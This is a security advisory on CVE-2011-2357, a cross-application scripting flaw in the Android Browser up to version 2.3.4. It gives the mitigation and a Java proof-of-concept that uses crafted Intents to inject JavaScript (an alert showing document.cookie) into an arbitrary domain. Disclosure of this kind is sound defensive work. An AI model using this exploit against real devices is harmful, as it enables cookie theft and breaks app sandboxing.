<--

Android Browser Cross-Application Scripting

Aleph Research Advisory

Identifier

CVE-2011-2357

Severity

High

Product

Android 2.3.4 and below

Mitigation

Install Android 2.3.5 or 3.2.

Technical Details

By generating a malicious Intent that targets Android’s Browser, Malware may epxloit the Android’s Browser URL loading process in order to inject JavaScript code into an arbitrary domain, thus breaking Android’s sandboxing.

Proof-of-Concept

public class CasExploit extends Activity
{
    static final String mPackage = "com.android.browser";
    static final String mClass = "BrowserActivity";
    static final String mUrl = "http://target.domain/";
    static final String mJavascript = "alert(document.cookie)";
    static final int mSleep = 15000;

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        startBrowserActivity(mUrl);
        
        try {
            Thread.sleep(mSleep);
        }
        
        catch (InterruptedException e) {}
        startBrowserActivity("javascript:" + mJavascript);
    }
    private void startBrowserActivity(String url) {
        Intent res = new Intent("android.intent.action.VIEW");
        res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
        res.setData(Uri.parse(url));
        startActivity(res);
    }
}

Timeline

Credit

External References

  1. Paper
  2. AOSP Commit #1
  3. AOSP Commit #2